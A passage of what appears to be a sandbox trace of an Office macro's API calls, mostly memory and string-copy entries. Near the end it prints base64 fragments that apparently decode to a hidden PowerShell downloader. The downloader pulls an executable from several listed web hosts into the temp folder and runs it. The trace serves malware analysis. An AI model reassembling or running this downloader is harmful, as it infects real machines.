_Dst=0x87fc638) returned 0x0 [0060.449] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f100e | out: _Dst=0x345c9c) returned 0x0 [0060.449] CRetailMalloc_Free () returned 0x6b30301 [0060.450] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f1032 | out: _Dst=0x87fc638) returned 0x0 [0060.450] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f1032 | out: _Dst=0x345c9c) returned 0x0 [0060.450] CRetailMalloc_Free () returned 0x6b30301 [0060.450] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f1056 | out: _Dst=0x87fc638) returned 0x0 [0060.450] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f1056 | out: _Dst=0x345c9c) returned 0x0 [0060.450] CRetailMalloc_Free () returned 0x6b30301 [0060.450] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f107a | out: _Dst=0x87fc638) returned 0x0 [0060.450] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f107a | out: _Dst=0x345c9c) returned 0x0 [0060.450] CRetailMalloc_Free () returned 0x6b30301 [0060.451] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f109e | out: _Dst=0x87504e0) returned 0x0 [0060.451] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f109e | out: _Dst=0x345c9c) returned 0x0 [0060.451] CRetailMalloc_Free () returned 0xb820401 [0060.451] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f10c6 | out: _Dst=0x87fc638) returned 0x0 [0060.451] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f10c6 | out: _Dst=0x345c9c) returned 0x0 [0060.451] CRetailMalloc_Free () returned 0x6b30301 [0060.451] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f1116 | out: _Dst=0x87fc638) returned 0x0 [0060.451] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f1116 | out: _Dst=0x345c9c) returned 0x0 [0060.451] CRetailMalloc_Free () returned 0x6b30301 [0060.451] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f10ee | out: _Dst=0x87504e0) returned 0x0 [0060.452] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f10ee | out: _Dst=0x345c9c) returned 0x0 [0060.452] CRetailMalloc_Free () returned 0xb820401 [0060.452] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f113a | out: _Dst=0x87fc638) returned 0x0 [0060.452] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f113a | out: _Dst=0x345c9c) returned 0x0 [0060.452] CRetailMalloc_Free () returned 0x6b30301 [0060.452] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f115e | out: _Dst=0x87fc638) returned 0x0 [0060.452] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f115e | out: _Dst=0x345c9c) returned 0x0 [0060.452] CRetailMalloc_Free () returned 0x6b30301 [0060.452] CRetailMalloc_Realloc () returned 0x8768e88 [0060.452] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f1182 | out: _Dst=0x87504e0) returned 0x0 [0060.453] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f1182 | out: _Dst=0x345c9c) returned 0x0 [0060.453] CRetailMalloc_Free () returned 0xb820401 [0060.453] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f11aa | out: _Dst=0x87504e0) returned 0x0 [0060.453] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f11aa | out: _Dst=0x345c9c) returned 0x0 [0060.453] CRetailMalloc_Free () returned 0xb820401 [0060.453] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f11f6 | out: _Dst=0x87fc638) returned 0x0 [0060.453] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f11f6 | out: _Dst=0x345c9c) returned 0x0 [0060.453] CRetailMalloc_Free () returned 0x6b30301 [0060.453] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f11d2 | out: _Dst=0x87fc638) returned 0x0 [0060.453] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f11d2 | out: _Dst=0x345c9c) returned 0x0 [0060.454] CRetailMalloc_Free () returned 0x6b30301 [0060.454] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f121e | out: _Dst=0x87fc638) returned 0x0 [0060.454] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f121e | out: _Dst=0x345c9c) returned 0x0 [0060.454] CRetailMalloc_Free () returned 0x6b30301 [0060.454] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f1242 | out: _Dst=0x87fc638) returned 0x0 [0060.454] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f1242 | out: _Dst=0x345c9c) returned 0x0 [0060.454] CRetailMalloc_Free () returned 0x6b30301 [0060.454] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f1266 | out: _Dst=0x87fc638) returned 0x0 [0060.454] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f1266 | out: _Dst=0x345c9c) returned 0x0 [0060.455] CRetailMalloc_Free () returned 0x6b30301 [0060.455] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f128a | out: _Dst=0x87fc638) returned 0x0 [0060.455] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f128a | out: _Dst=0x345c9c) returned 0x0 [0060.455] CRetailMalloc_Free () returned 0x6b30301 [0060.455] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f12ae | out: _Dst=0x87fc638) returned 0x0 [0060.455] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f12ae | out: _Dst=0x345c9c) returned 0x0 [0060.455] CRetailMalloc_Free () returned 0x6b30301 [0060.455] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f12d2 | out: _Dst=0x87fc638) returned 0x0 [0060.456] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.456] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f12d2 | out: _Dst=0x345c9c) returned 0x0 [0060.456] CRetailMalloc_Free () returned 0x6b30301 [0060.456] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f12f6 | out: _Dst=0x87fc638) returned 0x0 [0060.456] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f12f6 | out: _Dst=0x345c9c) returned 0x0 [0060.456] CRetailMalloc_Free () returned 0x6b30301 [0060.456] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f131a | out: _Dst=0x87fc638) returned 0x0 [0060.456] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f131a | out: _Dst=0x345c9c) returned 0x0 [0060.456] CRetailMalloc_Free () returned 0x6b30301 [0060.456] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f133e | out: _Dst=0x87504e0) returned 0x0 [0060.456] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f133e | out: _Dst=0x345c9c) returned 0x0 [0060.457] CRetailMalloc_Free () returned 0xb820401 [0060.457] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f1366 | out: _Dst=0x87fc638) returned 0x0 [0060.457] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f1366 | out: _Dst=0x345c9c) returned 0x0 [0060.457] CRetailMalloc_Free () returned 0x6b30301 [0060.457] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f138a | out: _Dst=0x87fc638) returned 0x0 [0060.457] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f138a | out: _Dst=0x345c9c) returned 0x0 [0060.457] CRetailMalloc_Free () returned 0x6b30301 [0060.457] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f13ae | out: _Dst=0x87fc638) returned 0x0 [0060.457] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f13ae | out: _Dst=0x345c9c) returned 0x0 [0060.458] CRetailMalloc_Free () returned 0x6b30301 [0060.458] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f13d2 | out: _Dst=0x87fc638) returned 0x0 [0060.458] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f13d2 | out: _Dst=0x345c9c) returned 0x0 [0060.458] CRetailMalloc_Free () returned 0x6b30301 [0060.458] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f13f6 | out: _Dst=0x87504e0) returned 0x0 [0060.458] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f13f6 | out: _Dst=0x345c9c) returned 0x0 [0060.458] CRetailMalloc_Free () returned 0xb820401 [0060.458] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f141e | out: _Dst=0x87504e0) returned 0x0 [0060.458] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f141e | out: _Dst=0x345c9c) returned 0x0 [0060.459] CRetailMalloc_Free () returned 0xb820401 [0060.459] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f146a | out: _Dst=0x87fc638) returned 0x0 [0060.459] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f146a | out: _Dst=0x345c9c) returned 0x0 [0060.459] CRetailMalloc_Free () returned 0x6b30301 [0060.459] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f1446 | out: _Dst=0x87fc638) returned 0x0 [0060.459] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f1446 | out: _Dst=0x345c9c) returned 0x0 [0060.459] CRetailMalloc_Free () returned 0x6b30301 [0060.459] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f1492 | out: _Dst=0x87fc638) returned 0x0 [0060.459] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f1492 | out: _Dst=0x345c9c) returned 0x0 [0060.459] CRetailMalloc_Free () returned 0x6b30301 [0060.460] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f14b6 | out: _Dst=0x87fc638) returned 0x0 [0060.460] CRetailMalloc_Free () returned 0x6b30301 [0060.460] CRetailMalloc_Free () returned 0x6b30301 [0060.460] CRetailMalloc_Free () returned 0xb820401 [0060.460] CRetailMalloc_Free () returned 0x6b30301 [0060.460] CRetailMalloc_Free () returned 0x6b30301 [0060.462] CRetailMalloc_Free () returned 0x6b30301 [0060.462] CRetailMalloc_Free () returned 0x6b30301 [0060.462] CRetailMalloc_Realloc () returned 0x7759f50 [0060.462] CRetailMalloc_Free () returned 0x6b30301 [0060.462] CRetailMalloc_Free () returned 0x6b30301 [0060.462] CRetailMalloc_Free () returned 0x6b30301 [0060.463] CRetailMalloc_Free () returned 0x6b30301 [0060.463] CRetailMalloc_Free () returned 0x6b30301 [0060.463] CRetailMalloc_Free () returned 0x6b30301 [0060.463] CRetailMalloc_Free () returned 0x6b30301 [0060.463] CRetailMalloc_Free () returned 0x6b30301 [0060.463] CRetailMalloc_Free () returned 0x6b30301 [0060.464] CRetailMalloc_Free () returned 0x6b30301 [0060.465] CRetailMalloc_Free () returned 0x6b30301 [0060.465] CRetailMalloc_Free () returned 0xb820401 [0060.465] CRetailMalloc_Free () returned 0x6b30301 [0060.465] CRetailMalloc_Free () returned 0x6b30301 [0060.465] CRetailMalloc_Free () returned 0x6b30301 [0060.465] CRetailMalloc_Free () returned 0x6b30301 [0060.466] CRetailMalloc_Free () returned 0x6b30301 [0060.466] CRetailMalloc_Free () returned 0x6b30301 [0060.466] CRetailMalloc_Free () returned 0x6b30301 [0060.466] CRetailMalloc_Free () returned 0x6b30301 [0060.466] CRetailMalloc_Free () returned 0xb820401 [0060.467] CRetailMalloc_Free () returned 0x6b30301 [0060.467] CRetailMalloc_Free () returned 0x6b30301 [0060.467] CRetailMalloc_Free () returned 0x6b30301 [0060.467] CRetailMalloc_Free () returned 0x6b30301 [0060.467] CRetailMalloc_Free () returned 0x6b30301 [0060.467] CRetailMalloc_Free () returned 0x6b30301 [0060.468] CRetailMalloc_Free () returned 0x6b30301 [0060.468] CRetailMalloc_Free () returned 0x6b30301 [0060.468] CRetailMalloc_Free () returned 0x6b30301 [0060.468] CRetailMalloc_Free () returned 0x6b30301 [0060.468] CRetailMalloc_Free () returned 0x6b30301 [0060.468] CRetailMalloc_Free () returned 0x6b30301 [0060.469] CRetailMalloc_Free () returned 0x6b30301 [0060.469] CRetailMalloc_Free () returned 0xb820401 [0060.469] CRetailMalloc_Free () returned 0x6b30301 [0060.469] CRetailMalloc_Free () returned 0x6b30301 [0060.469] CRetailMalloc_Free () returned 0x6b30301 [0060.470] CRetailMalloc_Free () returned 0x6b30301 [0060.470] CRetailMalloc_Alloc () returned 0x87504e0 [0060.470] CRetailMalloc_Free () returned 0xb820401 [0060.470] CRetailMalloc_Free () returned 0xb820401 [0060.470] CRetailMalloc_Free () returned 0x6b30301 [0060.470] CRetailMalloc_Free () returned 0x6b30301 [0060.471] CRetailMalloc_Free () returned 0x6b30301 [0060.471] CRetailMalloc_Free () returned 0x6b30301 [0060.471] CRetailMalloc_Free () returned 0xb820401 [0060.471] CRetailMalloc_Free () returned 0x6b30301 [0060.471] CRetailMalloc_Free () returned 0xb820401 [0060.472] CRetailMalloc_Free () returned 0x6b30301 [0060.472] CRetailMalloc_Free () returned 0x6b30301 [0060.472] CRetailMalloc_Free () returned 0x6b30301 [0060.472] CRetailMalloc_Free () returned 0xb820401 [0060.472] CRetailMalloc_Free () returned 0xb820401 [0060.472] CRetailMalloc_Free () returned 0x6b30301 [0060.473] CRetailMalloc_Free () returned 0x6b30301 [0060.473] CRetailMalloc_Free () returned 0x6b30301 [0060.473] CRetailMalloc_Free () returned 0x6b30301 [0060.473] CRetailMalloc_Free () returned 0x6b30301 [0060.473] CRetailMalloc_Free () returned 0x6b30301 [0060.473] CRetailMalloc_Free () returned 0x6b30301 [0060.474] CRetailMalloc_Free () returned 0xb820401 [0060.474] CRetailMalloc_Free () returned 0xb820401 [0060.474] CRetailMalloc_Free () returned 0x6b30301 [0060.474] CRetailMalloc_Free () returned 0x6b30301 [0060.474] CRetailMalloc_Free () returned 0x6b30301 [0060.475] CRetailMalloc_Free () returned 0x6b30301 [0060.475] CRetailMalloc_Free () returned 0x6b30301 [0060.475] CRetailMalloc_Free () returned 0xb820401 [0060.475] CRetailMalloc_Free () returned 0xb820401 [0060.475] CRetailMalloc_Realloc () returned 0x87cc360 [0060.475] CRetailMalloc_Free () returned 0x6b30301 [0060.476] CRetailMalloc_Free () returned 0xb820401 [0060.476] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.476] CRetailMalloc_Free () returned 0x6b30301 [0060.476] CRetailMalloc_Free () returned 0x6b30301 [0060.476] CRetailMalloc_Free () returned 0x6b30301 [0060.476] CRetailMalloc_Free () returned 0x6b30301 [0060.477] CRetailMalloc_Free () returned 0x6b30301 [0060.477] CRetailMalloc_Free () returned 0x6b30301 [0060.477] CRetailMalloc_Free () returned 0x6b30301 [0060.477] CRetailMalloc_Free () returned 0xb820401 [0060.477] CRetailMalloc_Free () returned 0x6b30301 [0060.478] CRetailMalloc_Free () returned 0x6b30301 [0060.478] CRetailMalloc_Free () returned 0x6b30301 [0060.478] CRetailMalloc_Free () returned 0x6b30301 [0060.478] CRetailMalloc_Free () returned 0xb820401 [0060.478] CRetailMalloc_Free () returned 0x6b30301 [0060.479] CRetailMalloc_Free () returned 0x6b30301 [0060.479] CRetailMalloc_Free () returned 0x6b30301 [0060.479] CRetailMalloc_Free () returned 0x6b30301 [0060.479] CRetailMalloc_Free () returned 0x6b30301 [0060.479] CRetailMalloc_Free () returned 0x6b30301 [0060.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889b9f4, cbMultiByte=21, lpWideCharStr=0x99339b0, cchWideChar=44 | out: lpWideCharStr="N0IFdTY3JpcHQuU2hlbGw") returned 21 [0060.480] CRetailMalloc_Realloc () returned 0x87d0f58 [0060.480] CRetailMalloc_Realloc () returned 0x8809e90 [0060.480] CRetailMalloc_Free () returned 0x6b30301 [0060.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889ba14, cbMultiByte=7, lpWideCharStr=0x9933b30, cchWideChar=16 | out: lpWideCharStr="7JHdlYm") returned 7 [0060.481] CRetailMalloc_Free () returned 0x6b30301 [0060.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889ba24, cbMultiByte=21, lpWideCharStr=0x9933c94, cchWideChar=44 | out: lpWideCharStr="NsaWVudCA9IG5ldy1vYmp") returned 21 [0060.481] CRetailMalloc_Free () returned 0x6b30301 [0060.481] CRetailMalloc_Free () returned 0x6b30301 [0060.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889ba5c, cbMultiByte=4, lpWideCharStr=0x9b40214, cchWideChar=10 | out: lpWideCharStr="kZGV") returned 4 [0060.482] CRetailMalloc_Free () returned 0xb820401 [0060.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889ba6c, cbMultiByte=8, lpWideCharStr=0x9b40372, cchWideChar=18 | out: lpWideCharStr="uICR3c2N") returned 8 [0060.482] CRetailMalloc_Free () returned 0x6b30301 [0060.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889ba7c, cbMultiByte=25, lpWideCharStr=0x9b404d8, cchWideChar=52 | out: lpWideCharStr="yaXB0ID0gbmV3LW9iamVjdCAt") returned 25 [0060.482] CRetailMalloc_Free () returned 0x6b30301 [0060.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889baa4, cbMultiByte=10, lpWideCharStr=0x9b40660, cchWideChar=22 | out: lpWideCharStr="Q29tT2JqZW") returned 10 [0060.482] CRetailMalloc_Free () returned 0x6b30301 [0060.482] CRetailMalloc_Free () returned 0x6b30301 [0060.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889badc, cbMultiByte=24, lpWideCharStr=0x9b40dd2, cchWideChar=50 | out: lpWideCharStr="ztmb3JlYWNoKCR1cmwgaW4gJ") returned 24 [0060.483] CRetailMalloc_Free () returned 0x6b30301 [0060.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889bafc, cbMultiByte=2, lpWideCharStr=0x9b40f58, cchWideChar=6 | out: lpWideCharStr="HV") returned 2 [0060.483] CRetailMalloc_Free () returned 0x6b30301 [0060.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889bb0c, cbMultiByte=31, lpWideCharStr=0x9b410b2, cchWideChar=64 | out: lpWideCharStr="ybHMpe3RyeXskd2ViY2xpZW50LkRvd2") returned 31 [0060.483] CRetailMalloc_Free () returned 0x6b30301 [0060.484] CRetailMalloc_Free () returned 0x6b30301 [0060.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889bb4c, cbMultiByte=14, lpWideCharStr=0x9b41646, cchWideChar=30 | out: lpWideCharStr="lY3QgU3lzdGVtL") returned 14 [0060.484] CRetailMalloc_Free () returned 0x6b30301 [0060.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889bb64, cbMultiByte=33, lpWideCharStr=0x9b417b8, cchWideChar=68 | out: lpWideCharStr="k5ldC5XZWJDbGllbnQ7JHJhbmRvbSA9IG") returned 33 [0060.484] CRetailMalloc_Free () returned 0x6b30301 [0060.484] CRetailMalloc_Free () returned 0x6b30301 [0060.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889bba4, cbMultiByte=51, lpWideCharStr=0x9b41b38, cchWideChar=104 | out: lpWideCharStr="dG9yZS5jb20vY2lhbnJmdC8saHR0cDovL3B4cGdyYXBoaWNzLmN") returned 51 [0060.484] CRetailMalloc_Free () returned 0x6b30301 [0060.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889bbe4, cbMultiByte=2, lpWideCharStr=0x9b41cf4, cchWideChar=6 | out: lpWideCharStr="vb") returned 2 [0060.485] CRetailMalloc_Free () returned 0x6b30301 [0060.485] CRetailMalloc_Free () returned 0xb820401 [0060.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889bc04, cbMultiByte=36, lpWideCharStr=0x9b42036, cchWideChar=74 | out: lpWideCharStr="5ldy1vYmplY3QgcmFuZG9tOyR1cmxzID0gJ2") returned 36 [0060.485] CRetailMalloc_Free () returned 0xb820401 [0060.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889bc34, cbMultiByte=22, lpWideCharStr=0x9b421d4, cchWideChar=46 | out: lpWideCharStr="h0dHA6Ly9jYXJiZXlvbmRz") returned 22 [0060.485] CRetailMalloc_Free () returned 0x6b30301 [0060.485] CRetailMalloc_Free () returned 0x6b30301 [0060.485] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889bc64, cbMultiByte=5, lpWideCharStr=0x9b4253e, cchWideChar=12 | out: lpWideCharStr="2dpZi") returned 5 [0060.486] CRetailMalloc_Free () returned 0x6b30301 [0060.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889bc74, cbMultiByte=30, lpWideCharStr=0x9b4269e, cchWideChar=62 | out: lpWideCharStr="5jb20uYnIvamVkdHZ1emlreS8saHR0") returned 30 [0060.486] CRetailMalloc_Realloc () returned 0x87284a0 [0060.486] CRetailMalloc_Free () returned 0x6b30301 [0060.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889bc9c, cbMultiByte=25, lpWideCharStr=0x9b42830, cchWideChar=52 | out: lpWideCharStr="cDovL21vdG9yZ2lybHN0di5jb") returned 25 [0060.486] CRetailMalloc_Free () returned 0x6b30301 [0060.486] CRetailMalloc_Free () returned 0x6b30301 [0060.486] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889bcdc, cbMultiByte=36, lpWideCharStr=0x9b42db8, cchWideChar=74 | out: lpWideCharStr="20va2RtLycuU3BsaXQoJywnKTskbmFtZSA9I") returned 36 [0060.486] CRetailMalloc_Free () returned 0x6b30301 [0060.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889bd0c, cbMultiByte=9, lpWideCharStr=0x9b42f56, cchWideChar=20 | out: lpWideCharStr="CRyYW5kb2") returned 9 [0060.487] CRetailMalloc_Free () returned 0x6b30301 [0060.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889bd24, cbMultiByte=19, lpWideCharStr=0x9b430be, cchWideChar=40 | out: lpWideCharStr="0ubmV4dCgxLCA2NTUzN") returned 19 [0060.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889be14, cbMultiByte=35, lpWideCharStr=0x9b5003c, cchWideChar=72 | out: lpWideCharStr="cG93ZXJzaGVsbCAtV2luZG93U3R5bGUgSGl") returned 35 [0060.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2946, cbMultiByte=9, lpWideCharStr=0x345c24, cchWideChar=10 | out: lpWideCharStr="dAdUSubT") returned 9 [0060.489] ITypeComp:RemoteBind (in: This=0x87cef08, szName="dAdUSubT", lHashVal=0x10823f, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x119a | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0x119a) returned 0x0 [0060.489] CRetailMalloc_Alloc () returned 0x87fc638 [0060.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x889beec, cbMultiByte=52, lpWideCharStr=0x9b5101a, cchWideChar=106 | out: lpWideCharStr="ik7JHBhdGggPSAkZW52OnRlbXAgKyAnXCcgKyAkbmFtZSArICcuZ") returned 52 [0060.489] CRetailMalloc_Realloc () returned 0x87bc708 [0060.490] CRetailMalloc_Realloc () returned 0x88a1ed0 [0060.492] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6fc2012, cbMultiByte=13, lpWideCharStr=0x345c34, cchWideChar=14 | out: lpWideCharStr="_B_var_pGOMH") returned 13 [0060.492] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_pGOMH", lHashVal=0x105558, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.493] CRetailMalloc_Realloc () returned 0x87ebd20 [0060.493] CRetailMalloc_Realloc () returned 0x76fc6a8 [0060.493] CRetailMalloc_Realloc () returned 0x87504e0 [0060.493] CRetailMalloc_Realloc () returned 0x87fc638 [0060.494] CRetailMalloc_Realloc () returned 0x86bb820 [0060.494] CRetailMalloc_Realloc () returned 0x8876210 [0060.494] CRetailMalloc_Realloc () returned 0x87fc6b0 [0060.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2e7e, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="jJcpCZqge") returned 10 [0060.495] ITypeComp:RemoteBind (in: This=0x87ce890, szName="jJcpCZqge", lHashVal=0x107504, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11e2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0x11e2) returned 0x0 [0060.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2e7e, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="jJcpCZqge") returned 10 [0060.495] ITypeComp:RemoteBind (in: This=0x87ce668, szName="jJcpCZqge", lHashVal=0x107504, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11e2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0x11e2) returned 0x0 [0060.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2e7e, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="jJcpCZqge") returned 10 [0060.495] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="jJcpCZqge", lHashVal=0x107504, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11e2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0x11e2) returned 0x0 [0060.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x56f2e7e, cbMultiByte=10, lpWideCharStr=0x345c24, cchWideChar=11 | out: lpWideCharStr="jJcpCZqge") returned 10 [0060.496] ITypeComp:RemoteBind (in: This=0x87cef08, szName="jJcpCZqge", lHashVal=0x107504, wFlags=0x5, 